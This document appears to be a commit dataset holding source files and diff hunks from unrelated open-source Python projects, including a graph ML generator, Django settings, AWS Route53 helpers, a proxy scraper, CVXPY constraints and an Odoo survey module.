stellargraph/mapper/graph_generator.py
|
stellargraph/mapper/graph_generator.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2020 Data61, CSIRO
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from ..core.graph import StellarGraph
from ..core.utils import is_real_iterable
from .sequences import GraphSequence
from ..core.experimental import experimental
@experimental(reason="Missing unit tests.", issues=[1042])
class GraphGenerator:
"""
A data generator for use with graph classification algorithms.
The supplied graphs should be :class:`StellarGraph` objects ready for machine learning. The generator
requires node features to be available for all nodes in the graph.
Use the :meth:`flow` method supplying the graph indexes and (optionally) targets
to get an object that can be used as a Keras data generator.
This generator supplies the features arrays and the adjacency matrices to a
mini-batch Keras graph classification model.
Args:
graphs (list): a collection of ready for machine-learning StellarGraph-type objects
name (str): an optional name of the generator
"""
def __init__(self, graphs, name=None):
self.node_features_size = None
for graph in graphs:
if not isinstance(graph, StellarGraph):
raise TypeError(
f"graphs: expected every element to be a StellarGraph object, found {type(graph).__name__}."
)
if len(graph.node_types) > 1:
raise ValueError(
"graphs: node generator requires graphs with single node type, "
f"found a graph with {len(graph.node_types)} node types."
)
graph.check_graph_for_ml()
# we require that all graphs have node features of the same dimensionality
f_dim = graph.node_feature_sizes()[list(graph.node_types)[0]]
if self.node_features_size is None:
self.node_features_size = f_dim
elif self.node_features_size != f_dim:
raise ValueError(
"graphs: expected node features for all graph to have same dimensions,"
f"found {self.node_features_size} vs {f_dim}"
)
self.graphs = graphs
self.name = name
def flow(self, graph_ilocs, targets=None, batch_size=1, name=None):
"""
Creates a generator/sequence object for training, evaluation, or prediction
with the supplied graph indexes and targets.
Args:
graph_ilocs (iterable): an iterable of graph indexes in self.graphs for the graphs of interest
(e.g., training, validation, or test set nodes).
targets (2d array, optional): a 2D array of numeric graph targets with shape `(len(graph_ilocs),
len(targets))`.
batch_size (int, optional): The batch size.
name (str, optional): An optional name for the returned generator object.
Returns:
A :class:`GraphSequence` object to use with Keras methods :meth:`fit`, :meth:`evaluate`, and :meth:`predict`
"""
if targets is not None:
# Check targets is an iterable
if not is_real_iterable(targets):
raise TypeError(
f"targets: expected an iterable or None object, found {type(targets).__name__}"
)
# Check targets correct shape
if len(targets) != len(graph_ilocs):
raise ValueError(
f"expected targets to be the same length as node_ids, found {len(targets)} vs {len(graph_ilocs)}"
)
if not isinstance(batch_size, int):
raise TypeError(
f"expected batch_size to be integer type, found {type(batch_size)}"
)
if batch_size <= 0:
raise ValueError(
f"expected batch_size to be strictly positive integer, found {batch_size}"
)
return GraphSequence(
graphs=[self.graphs[i] for i in graph_ilocs],
targets=targets,
batch_size=batch_size,
name=name,
)
|
Python
| 0.000003
|
@@ -4270,16 +4270,25 @@
ch_size)
+.__name__
%7D%22%0A
|
162474c612f8e9d6a4f6d21640cd33b525fe440d
|
add cache busting
|
app/settings.py
|
app/settings.py
|
"""
Django settings for testP project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
import dj_database_url
from .hackathon_variables import *
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.environ.get('SECRET', ')6+vf9(1tihg@u8!+(0abk+y*#$3r$(-d=g5qhm@1&lo4pays&')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = not os.environ.get('PROD_MODE', None)
ALLOWED_HOSTS = ['localhost', '127.0.0.1', '0.0.0.0']
# Application definition
INSTALLED_APPS = [
'jet',
'jet.dashboard',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.humanize',
'django.contrib.messages',
'django.contrib.staticfiles',
'form_utils',
'bootstrap3',
'django_tables2',
'organizers',
'checkin',
'user',
'applications',
'teams',
'stats',
]
if REIMBURSEMENT_ENABLED:
INSTALLED_APPS.append('reimbursement')
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'app.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': ['app/templates', ],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'django.template.context_processors.request',
'app.utils.hackathon_vars_processor'
],
},
},
]
WSGI_APPLICATION = 'app.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if os.environ.get('DATABASE_URL', None):
DATABASES['default'] = dj_database_url.config(conn_max_age=600)
if os.environ.get('PG_PWD', None):
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': os.environ.get('PG_NAME', 'backend'),
'USER': os.environ.get('PG_USER', 'backenduser'),
'PASSWORD': os.environ.get('PG_PWD'),
'HOST': os.environ.get('PG_HOST', 'localhost'),
'PORT': '5432',
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Logging config to send logs to email automatically
LOGGING = {
'version': 1,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
},
'handlers': {
'admin_email': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'app.log.HackathonDevEmailHandler',
},
},
'loggers': {
'django': {
'level': 'ERROR',
'handlers': ['admin_email'],
},
},
}
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = BASE_DIR + '/staticfiles'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, os.path.join('app', "static")),
]
# File upload configuration
MEDIA_ROOT = 'files'
MEDIA_URL = '/files/'
SENDGRID_API_KEY = os.environ.get('SG_KEY', None)
# Load filebased email backend if no Sendgrid credentials and debug mode
if not SENDGRID_API_KEY and DEBUG:
EMAIL_BACKEND = 'django.core.mail.backends.filebased.EmailBackend'
EMAIL_FILE_PATH = 'tmp/email-messages/'
else:
EMAIL_BACKEND = "sgbackend.SendGridBackend"
# Jet configs
JET_SIDE_MENU_COMPACT = True
JET_INDEX_DASHBOARD = 'app.jet_dashboard.CustomIndexDashboard'
# Set up custom auth
AUTH_USER_MODEL = 'user.User'
LOGIN_URL = 'account_login'
PASSWORD_RESET_TIMEOUT_DAYS = 1
BOOTSTRAP3 = {
# Don't normally want placeholders.
'set_placeholder': False,
'required_css_class': 'required',
}
if DEBUG:
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
else:
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.filebased.FileBasedCache',
'LOCATION': os.path.join(BASE_DIR, 'cache'),
}
}
# Add domain to allowed hosts
ALLOWED_HOSTS.append(HACKATHON_DOMAIN)
# Deployment configurations for proxy pass and csrf
CSRF_TRUSTED_ORIGINS = ALLOWED_HOSTS
USE_X_FORWARDED_HOST = True
SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')
# Maximum file upload size for forms
MAX_UPLOAD_SIZE = 5242880
|
Python
| 0.000001
|
@@ -4698,16 +4698,102 @@
ic%22)),%0A%5D
+%0ASTATICFILES_STORAGE = 'django.contrib.staticfiles.storage.ManifestStaticFilesStorage'
%0A%0A# Fil
|
0cb7f9c41c7ae0a7f487188721f56adf2ff9999d
|
add type hints.
|
lib/acli/services/route53.py
|
lib/acli/services/route53.py
|
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, print_function, unicode_literals)
from boto3.session import Session
from acli.output.route53 import (output_route53_list, output_route53_info)
import botocore.exceptions
def get_boto3_session(aws_config):
return Session(region_name=aws_config.region,
aws_access_key_id=aws_config.access_key_id,
aws_secret_access_key=aws_config.secret_access_key)
def route53_list(aws_config=None):
session = get_boto3_session(aws_config)
conn = session.client('route53')
output_route53_list(output_media='console', zones=conn.list_hosted_zones())
def route53_info(aws_config=None, zone_id=None):
"""
@type aws_config: Config
@type zone_id: unicode
"""
session = get_boto3_session(aws_config)
conn = session.client('route53')
try:
hosted_zone = conn.get_hosted_zone(Id=zone_id)
record_sets = conn.list_resource_record_sets(HostedZoneId=zone_id)
if hosted_zone['HostedZone']['Id']:
output_route53_info(output_media='console',
zone=hosted_zone,
record_sets=record_sets)
except AttributeError:
exit("Cannot find hosted zone: {0}".format(zone_id))
except botocore.exceptions.ClientError:
exit("Cannot request hosted zone: {0}".format(zone_id))
|
Python
| 0
|
@@ -265,16 +265,61 @@
onfig):%0A
+ %22%22%22%0A @type aws_config: Config%0A %22%22%22%0A
retu
@@ -527,24 +527,69 @@
nfig=None):%0A
+ %22%22%22%0A @type aws_config: Config%0A %22%22%22%0A
session
|
b747391c748c94cd8433dfacd935d131b484a29c
|
Improve error handling and refactor base path
|
java/ql/src/utils/model-generator/RegenerateModels.py
|
java/ql/src/utils/model-generator/RegenerateModels.py
|
#!/usr/bin/python3
# Tool to regenerate existing framework CSV models.
from pathlib import Path
import json
import os
import requests
import shutil
import subprocess
import tempfile
import sys
lgtmSlugToModelFile = {
# "apache/commons-beanutils": "java/ql/lib/semmle/code/java/frameworks/apache/BeanUtilsGenerated.qll",
# "apache/commons-codec": "java/ql/lib/semmle/code/java/frameworks/apache/CodecGenerated.qll",
# "apache/commons-lang": "java/ql/lib/semmle/code/java/frameworks/apache/Lang3Generated.qll",
"apache/commons-io": "java/ql/lib/semmle/code/java/frameworks/apache/IOGenerated.qll",
}
def findGitRoot():
return subprocess.check_output(
["git", "rev-parse", "--show-toplevel"]).decode("utf-8").strip()
def regenerateModel(lgtmSlug, extractedDb):
tmpDir = tempfile.mkdtemp()
print("============================================================")
print("Generating models for " + lgtmSlug)
print("============================================================")
modelFile = lgtmSlugToModelFile[lgtmSlug]
codeQlRoot = findGitRoot()
targetModel = codeQlRoot + "/" + modelFile
subprocess.check_call([codeQlRoot + "/java/ql/src/utils/model-generator/GenerateFlowModel.py", extractedDb,
targetModel])
print("Regenerated " + targetModel)
shutil.rmtree(tmpDir)
if len(sys.argv) == 3:
lgtmSlug = sys.argv[1]
db = sys.argv[2]
regenerateModel(lgtmSlug, db)
else:
print('error')
|
Python
| 0
|
@@ -190,16 +190,77 @@
t sys%0A%0A%0A
+defaultModelPath = %22java/ql/lib/semmle/code/java/frameworks%22%0A
lgtmSlug
@@ -314,48 +314,8 @@
%22: %22
-java/ql/lib/semmle/code/java/frameworks/
apac
@@ -377,48 +377,8 @@
%22: %22
-java/ql/lib/semmle/code/java/frameworks/
apac
@@ -435,48 +435,8 @@
%22: %22
-java/ql/lib/semmle/code/java/frameworks/
apac
@@ -489,48 +489,8 @@
%22: %22
-java/ql/lib/semmle/code/java/frameworks/
apac
@@ -923,19 +923,265 @@
-modelFile =
+# check if lgtmSlug exists as key%0A if lgtmSlug not in lgtmSlugToModelFile:%0A print(%22ERROR: slug %22 + lgtmSlug +%0A %22 is not mapped to a model file in script %22 + sys.argv%5B0%5D)%0A sys.exit(1)%0A modelFile = defaultModelPath + %5C%0A
lgt
|
f3fd4d098ef5465776cd3e71a8e6c889a2b74ff6
|
Update proxy.py
|
lazada_scsdk/proxy.py
|
lazada_scsdk/proxy.py
|
# -*- coding: utf-8 -*-
# @Author: Phu Hoang
# @Date: 2017-05-23 09:40:32
# @Last Modified by: Phu Hoang
# @Last Modified time: 2017-06-16 10:53:12
import logging
from requests.exceptions import ReadTimeout
from http_request_randomizer.requests.proxy.requestProxy import RequestProxy
from http_request_randomizer.requests.parsers.FreeProxyParser import FreeProxyParser
from http_request_randomizer.requests.parsers.ProxyForEuParser import ProxyForEuParser
from http_request_randomizer.requests.parsers.RebroWeeblyParser import RebroWeeblyParser
from http_request_randomizer.requests.parsers.SamairProxyParser import SamairProxyParser
from http_request_randomizer.requests.parsers.HideMyAssProxyParser import HideMyAssProxyParser
from http_request_randomizer.requests.useragent.userAgent import UserAgentManager
# Push back requests library to at least warnings
logging.getLogger("requests").setLevel(logging.WARNING)
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)-6s %(levelname)-8s %(message)s')
handler.setFormatter(formatter)
class Proxy(RequestProxy):
def __init__(self, web_proxy_list=[], sustain=False, timeout=20):
self.userAgent = UserAgentManager()
self.logger = logging.getLogger()
self.logger.addHandler(handler)
self.logger.setLevel(0)
#####
# Each of the classes below implements a specific URL Parser
#####
parsers = list([])
# parsers.append(FreeProxyParser('http://free-proxy-list.net', timeout=timeout))
parsers.append(ProxyForEuParser('http://proxyfor.eu/geo.php', 1.0, timeout=timeout))
parsers.append(RebroWeeblyParser('http://rebro.weebly.com', timeout=timeout))
parsers.append(SamairProxyParser('http://samair.ru/proxy/time-01.htm', timeout=timeout))
parsers.append(HideMyAssProxyParser('http://proxylist.hidemyass.com/', timeout=timeout))
self.sustain = sustain
self.parsers = parsers
self.proxy_list = web_proxy_list
if len(self.proxy_list) == 0:
self.logger.debug("=== Initialized Proxy Parsers ===")
for i in range(len(parsers)):
self.logger.debug("\t {0}".format(parsers[i].__str__()))
self.logger.debug("=================================")
for i in range(len(parsers)):
try:
self.proxy_list += parsers[i].parse_proxyList()
except ReadTimeout:
self.logger.warn("Proxy Parser: '{}' TimedOut!".format(parsers[i].url))
else:
print("Loaded proxies from file")
self.current_proxy = self.randomize_proxy()
|
Python
| 0.000001
|
@@ -1455,18 +1455,16 @@
%0A
- #
parsers
|
394d5f9cd7c911fa790a63332101b784f67f8b55
|
Add dual variables to constraints
|
cvxpy/constraints/leq_constraint.py
|
cvxpy/constraints/leq_constraint.py
|
"""
Copyright 2013 Steven Diamond
This file is part of CVXPY.
CVXPY is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CVXPY is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CVXPY. If not, see <http://www.gnu.org/licenses/>.
"""
import cvxpy.utilities as u
import cvxpy.lin_ops.lin_utils as lu
from cvxpy.constraints.constraint import Constraint
import numpy as np
class LeqConstraint(u.Canonical, Constraint):
OP_NAME = "<="
TOLERANCE = 1e-4
def __init__(self, lh_exp, rh_exp):
self.args = [lh_exp, rh_exp]
self._expr = lh_exp - rh_exp
self._dual_value = None
super(LeqConstraint, self).__init__()
@property
def id(self):
"""Wrapper for compatibility with variables.
"""
return self.constr_id
def name(self):
return ' '.join([str(self.args[0].name()),
self.OP_NAME,
str(self.args[1].name())])
def __str__(self):
"""Returns a string showing the mathematical constraint.
"""
return self.name()
def __repr__(self):
"""Returns a string with information about the constraint.
"""
return "%s(%s, %s)" % (self.__class__.__name__,
repr(self.args[0]),
repr(self.args[1]))
def __nonzero__(self):
"""Raises an exception when called.
Python 2 version.
Called when evaluating the truth value of the constraint.
Raising an error here prevents writing chained constraints.
"""
raise Exception("Cannot evaluate the truth value of a constraint.")
def __bool__(self):
"""Raises an exception when called.
Python 3 version.
Called when evaluating the truth value of the constraint.
Raising an error here prevents writing chained constraints.
"""
raise Exception("Cannot evaluate the truth value of a constraint.")
@property
def size(self):
return self._expr.size
# Left hand expression must be convex and right hand must be concave.
def is_dcp(self):
return self._expr.is_convex()
def canonicalize(self):
"""Returns the graph implementation of the object.
Marks the top level constraint as the dual_holder,
so the dual value will be saved to the LeqConstraint.
Returns
-------
tuple
A tuple of (affine expression, [constraints]).
"""
obj, constraints = self._expr.canonical_form
dual_holder = lu.create_leq(obj, constr_id=self.id)
return (None, constraints + [dual_holder])
def variables(self):
"""Returns the variables in the compared expressions.
"""
return self._expr.variables()
def parameters(self):
"""Returns the parameters in the compared expressions.
"""
return self._expr.parameters()
@property
def value(self):
"""Does the constraint hold?
Returns
-------
bool
"""
if self._expr.value is None:
return None
else:
return np.all(self._expr.value <= self.TOLERANCE)
@property
def violation(self):
"""How much is this constraint off by?
Returns
-------
NumPy matrix
"""
if self._expr.value is None:
return None
else:
return np.maximum(self._expr.value, 0)
# The value of the dual variable.
@property
def dual_value(self):
return self._dual_value
def save_value(self, value):
"""Save the value of the dual variable for the constraint's parent.
Args:
value: The value of the dual variable.
"""
self._dual_value = value
|
Python
| 0
|
@@ -718,16 +718,126 @@
s as lu%0A
+# Only need Variable from expressions, but that would create a circular import.%0Afrom cvxpy import expressions%0A
from cvx
@@ -1117,26 +1117,72 @@
elf.
-_
dual_va
-lue = None
+riable = expressions.variables.Variable(*self._expr.size)
%0A
@@ -4160,30 +4160,38 @@
return self.
-_
dual_
+variable.
value%0A%0A d
@@ -4389,24 +4389,36 @@
elf.
-_
dual_va
-lue =
+riable.save_value(
value
+)
%0A
|
1e1e2793bad3db9201e51c5038edde5373424ad6
|
Put infrastructure in place for javascript targetting
|
client/compile.py
|
client/compile.py
|
#!/usr/bin/env python
import os.path
from HTMLParser import HTMLParser
import re
"""
Certain runtimes (like AIR) don't support dynamic function creation. Parse the
JavaScript and create the template beforehand.
"""
class Compiler(HTMLParser):
script = ''
scripts = {}
inScript = False
scriptName = ''
def handle_startendtag(self, tag, attrs):
if self.inScript:
self.script += '<' + tag
if attrs:
for key, value in attrs:
self.script += ' ' + key + '=' + '"' + value + '"'
self.script += '/>'
def handle_starttag(self, tag, attrs):
if self.inScript:
self.script += '<' + tag
if attrs:
for key, value in attrs:
self.script += ' ' + key + '=' + '"' + value + '"'
self.script += '>'
if tag == 'script':
found = False
name = ''
for i in attrs:
if i[0] == 'type' and i[1] == 'text/html':
found = True
elif i[0] == 'name':
name = i[1]
if found:
self.inScript = True
self.scriptName = name
def handle_endtag(self, tag):
if tag == 'script' and self.inScript:
self.inScript = False
self.scripts[self.scriptName] = self.script
self.script = ''
elif self.inScript:
self.script += '</' + tag + '>'
def handle_data(self, data):
if self.inScript:
self.script += data
def main():
html_path = os.path.join(os.path.dirname(__file__), 'index.html')
buffer = open(html_path)
data = buffer.read()
buffer.close()
parser = Compiler()
parser.feed(data)
parser.close()
scripts = ''
for name, script in parser.scripts.items():
# Convert the template into pure JavaScript
scr = re.sub(r'\s+', ' ', re.sub(r"(\r|\t|\n)", ' ', script))
scr = scr.replace('<%', '\t')
scr = re.sub(r"((^|%>)[^\t]*)'", r'\1\n', scr)
scr = scr.replace("'", "\\'")
scr = re.sub(r"\t=(.*?)%>", "',\\1,'", scr)
scr = scr.replace("\t", "');").replace('%>', "p.push('").replace("\n", "\\'")
scr = "TileMill.templates['%s']=function(obj) {var p=[],print=function(){p.push.apply(p,arguments);};with(obj){p.push('" % (name) + scr + "');}return p.join(''); }\n"
scripts += scr
js_path = os.path.join(os.path.dirname(__file__), 'js', 'includes', 'template.cache.js')
buffer = open(js_path, 'w')
buffer.write(scripts)
buffer.close()
if __name__ == "__main__":
main()
|
Python
| 0.000001
|
@@ -272,16 +272,37 @@
ts = %7B%7D%0A
+ javascripts = %7B%7D%0A
inSc
@@ -925,21 +925,17 @@
-found = False
+name = ''
%0A
@@ -935,36 +935,38 @@
''%0A
-name
+target
= ''%0A
@@ -1020,33 +1020,237 @@
ype'
- and i%5B1%5D == 'text/html':
+:%0A if i%5B1%5D == 'text/html':%0A self.inScript = True;%0A elif i%5B1%5D == 'text/javascript':%0A # Evaluate the target and built it for the necesarry runtime.
%0A
@@ -1367,31 +1367,8 @@
if
-found:%0A
self
@@ -1376,23 +1376,17 @@
inScript
- = True
+:
%0A
|
233916de4fae7430ac28856939767f639fefd19d
|
Fix issue with FileRefField.
|
cms/apps/media/models.py
|
cms/apps/media/models.py
|
"""Models used by the static media management application."""
from __future__ import unicode_literals
from PIL import Image
from django.db import models
from django.contrib import admin
from django.contrib.admin.widgets import ForeignKeyRawIdWidget
from django.utils.encoding import python_2_unicode_compatible
import os
@python_2_unicode_compatible
class Label(models.Model):
"""
A notional label used to organise static media.
This does not correspond to a physical label on the disk.
"""
name = models.CharField(max_length=200)
def __str__(self):
"""Returns the name of the label."""
return self.name
class Meta:
ordering = ("name",)
@python_2_unicode_compatible
class File(models.Model):
"""A static file."""
title = models.CharField(max_length=200,
help_text="The title will be used as the default rollover text when this media is embedded in a web page.")
labels = models.ManyToManyField(
Label,
blank=True,
help_text="Labels are used to help organise your media. They are not visible to users on your website.",
)
file = models.FileField(
upload_to="uploads/files",
max_length=250,
)
def get_absolute_url(self):
"""Generates the absolute URL of the image."""
return self.file.url
def __str__(self):
"""Returns the title of the media."""
return self.title
class Meta:
ordering = ("title",)
def is_image(self):
from .admin import FILE_ICONS, IMAGE_FILE_ICON, UNKNOWN_FILE_ICON
_, extension = os.path.splitext(self.file.name)
extension = extension.lower()[1:]
icon = FILE_ICONS.get(extension, UNKNOWN_FILE_ICON)
return icon == IMAGE_FILE_ICON
def width(self):
if self.is_image():
with open(self.file.path, "rb") as f:
try:
image = Image.open(f)
except IOError:
return 0
image.verify()
return image.size[0]
return 0
def height(self):
if self.is_image():
with open(self.file.path, "rb") as f:
try:
image = Image.open(f)
except IOError:
return 0
image.verify()
return image.size[1]
return 0
class FileRefField(models.ForeignKey):
"""A foreign key to a File, constrained to only select image files."""
def __init__(self, **kwargs):
kwargs["to"] = File
kwargs.setdefault("related_name", "+")
kwargs.setdefault("on_delete", models.PROTECT)
super(FileRefField, self).__init__(**kwargs)
def formfield(self, **kwargs):
defaults = {
"widget": ForeignKeyRawIdWidget(self.rel, admin.site),
}
return super(FileRefField, self).formfield(**defaults)
IMAGE_FILTER = {
"file__iregex": r"\.(png|gif|jpg|jpeg)$"
}
class ImageRefField(FileRefField):
"""A foreign key to a File, constrained to only select image files."""
def __init__(self, **kwargs):
kwargs["limit_choices_to"] = IMAGE_FILTER
super(ImageRefField, self).__init__(**kwargs)
VIDEO_FILTER = {
"file__iregex": r"\.(webm|mp4|m4v)$"
}
class VideoFileRefField(FileRefField):
"""A foreign key to a File, constrained to only select video files."""
def __init__(self, **kwargs):
kwargs["limit_choices_to"] = VIDEO_FILTER
super(VideoFileRefField, self).__init__(**kwargs)
@python_2_unicode_compatible
class Video(models.Model):
title = models.CharField(
max_length=200,
)
image = ImageRefField(
blank=True,
null=True,
)
high_resolution_mp4 = VideoFileRefField(
verbose_name="high resolution MP4",
blank=True,
null=True,
)
low_resolution_mp4 = VideoFileRefField(
verbose_name="low resolution MP4",
blank=True,
null=True
)
webm = VideoFileRefField(
verbose_name="WebM",
blank=True,
null=True,
)
def __str__(self):
"""Returns the title of the media."""
return self.title
class Meta:
ordering = ("title",)
class VideoRefField(models.ForeignKey):
"""A foreign key to a File, constrained to only select image files."""
def __init__(self, **kwargs):
kwargs["to"] = Video
kwargs.setdefault("related_name", "+")
kwargs.setdefault("on_delete", models.PROTECT)
super(VideoRefField, self).__init__(**kwargs)
def formfield(self, **kwargs):
defaults = {
"widget": ForeignKeyRawIdWidget(self.rel, admin.site),
}
return super(VideoRefField, self).formfield(**defaults)
|
Python
| 0
|
@@ -2565,28 +2565,75 @@
+if 'to' in kwargs:%0A del
kwargs%5B
-%22to%22%5D
+'to'%5D%0A%0A to
= File%0A
|
7dffc7115b5e91ba13de8cb3e306832be7f8e185
|
print result in show components
|
client/jiraffe.py
|
client/jiraffe.py
|
import urllib
import os
SERVICE_URL = "http://jiraffe.cloudhub.io/api"
CREATE_SERVICE = SERVICE_URL + "/issues"
DEFAULT_SERVICE = SERVICE_URL + "/defaults"
COMPONENT_SERVICE = SERVICE_URL + "/components"
def get_valid_reporter(reporter):
if reporter == "":
return os.environ['JIRA_ID']
return reporter
def createIssue(project, summary, bug_type, sprint, reporter, assignee, priority, component):
query_args = {'summary': summary, 'reporter': get_valid_reporter(reporter)}
headers = {"content-type": "application/plain-text"}
if project != "":
query_args['project'] = project
if bug_type != "":
query_args['type'] = bug_type
if sprint != "":
query_args['sprint'] = sprint
valid_assignee = get_valid_reporter(assignee)
if valid_assignee != "":
query_args['assignee'] = valid_assignee
if priority != "":
query_args['priority'] = priority
encoded_args = urllib.urlencode(query_args)
#print(encoded_args)
print(urllib.urlopen(CREATE_SERVICE +"?"+ encoded_args, encoded_args).read())
def update_defaults(project, sprint, bug_type):
#{"sprint":"123","type":"Bug","project":"AUTOMATION","id":9}
query_args = {}
if project != "":
query_args['project'] = project
if bug_type != "":
query_args['type'] = bug_type
if sprint != "":
query_args['sprint'] = sprint
encoded_args = urllib.urlencode(query_args)
#print(encoded_args)
headers = {"content-type": "application/plain-text"}
print(urllib.urlopen(DEFAULT_SERVICE +"?"+ encoded_args, encoded_args).read())
def show_issue(issue_id):
response = urllib.urlopen(CREATE_SERVICE + "/" + issue_id)
print(response.read())
def show_components(project_id):
query_args = {}
if project_id != "":
query_args['project'] = project_id
encoded_args = urllib.urlencode(query_args)
response = urllib.urlopen(COMPONENT_SERVICE+ "?" + encoded_args)
def show_defaults():
response = urllib.urlopen(DEFAULT_SERVICE)
print(response.read())
|
Python
| 0
|
@@ -1963,16 +1963,42 @@
d_args)%0A
+ print(response.read())
%0A%0Adef sh
|
a7e45cc5cd9ec9d706b4160f988616d87e185cb8
|
FIX survey validate_questions
|
survey_conditional_questions/survey.py
|
survey_conditional_questions/survey.py
|
# -*- coding: utf-8 -*-
from openerp import fields, models
class survey_question(models.Model):
_inherit = 'survey.question'
conditional = fields.Boolean(
'Conditional Question',
copy=False,
# we add copy = false to avoid wrong link on survey copy,
# should be improoved
)
question_conditional_id = fields.Many2one(
'survey.question',
'Question',
copy=False,
help="In order to edit this field you should first save the question"
)
answer_id = fields.Many2one(
'survey.label',
'Answer',
copy=False,
)
# NO HACEMOS ESTA MOD GENERICA PORQUE DA ERROR AL ALMACENAR LOS CHOICE
# def validate_question(
# self, cr, uid, question, post, answer_tag, context=None):
# """We add answer_tag if not in post because it gets an error in this
# method, this happens when question is not display so the answer_tag
# value is no on post dictionary"""
# if answer_tag not in post:
# post[answer_tag] = ''
# return super(survey_question, self).validate_question(
# cr, uid, question, post, answer_tag, context=context)
def validate_free_text(
self, cr, uid, question, post, answer_tag, context=None):
"""We add answer_tag if not in post because it gets an error in this
method, this happens when question is not display so the answer_tag
value is no on post dictionary"""
if answer_tag not in post:
post[answer_tag] = ''
return super(survey_question, self).validate_free_text(
cr, uid, question, post, answer_tag, context=context)
def validate_textbox(
self, cr, uid, question, post, answer_tag, context=None):
"""We add answer_tag if not in post because it gets an error in this
method, this happens when question is not display so the answer_tag
value is no on post dictionary"""
if answer_tag not in post:
post[answer_tag] = ''
return super(survey_question, self).validate_textbox(
cr, uid, question, post, answer_tag, context=context)
def validate_numerical_box(
self, cr, uid, question, post, answer_tag, context=None):
"""We add answer_tag if not in post because it gets an error in this
method, this happens when question is not display so the answer_tag
value is no on post dictionary"""
if answer_tag not in post:
post[answer_tag] = ''
return super(survey_question, self).validate_numerical_box(
cr, uid, question, post, answer_tag, context=context)
def validate_datetime(
self, cr, uid, question, post, answer_tag, context=None):
"""We add answer_tag if not in post because it gets an error in this
method, this happens when question is not display so the answer_tag
value is no on post dictionary"""
if answer_tag not in post:
post[answer_tag] = ''
return super(survey_question, self).validate_datetime(
cr, uid, question, post, answer_tag, context=context)
class survey_user_input(models.Model):
_inherit = 'survey.user_input'
def get_list_questions(self, cr, uid, survey, user_input_id):
obj_questions = self.pool['survey.question']
obj_user_input_line = self.pool['survey.user_input_line']
questions_to_hide = []
question_ids = obj_questions.search(
cr,
uid,
[('survey_id', '=', survey.id)])
for question in obj_questions.browse(cr, uid, question_ids):
if question.conditional:
for question2 in obj_questions.browse(cr, uid, question_ids):
if question2 == question.question_conditional_id:
input_answer_id = obj_user_input_line.search(
cr,
uid,
[('user_input_id', '=', user_input_id),
('question_id', '=', question2.id)])
if question.answer_id != obj_user_input_line.browse(
cr,
uid,
input_answer_id).value_suggested:
questions_to_hide.append(question.id)
return questions_to_hide
|
Python
| 0
|
@@ -52,16 +52,70 @@
models%0A
+import logging%0A%0A_logger = logging.getLogger(__name__)%0A
%0A%0Aclass
@@ -674,85 +674,8 @@
%0A
- # NO HACEMOS ESTA MOD GENERICA PORQUE DA ERROR AL ALMACENAR LOS CHOICE%0A #
def
@@ -689,34 +689,32 @@
te_question(%0A
- #
self, c
@@ -771,357 +771,165 @@
%0A
- #
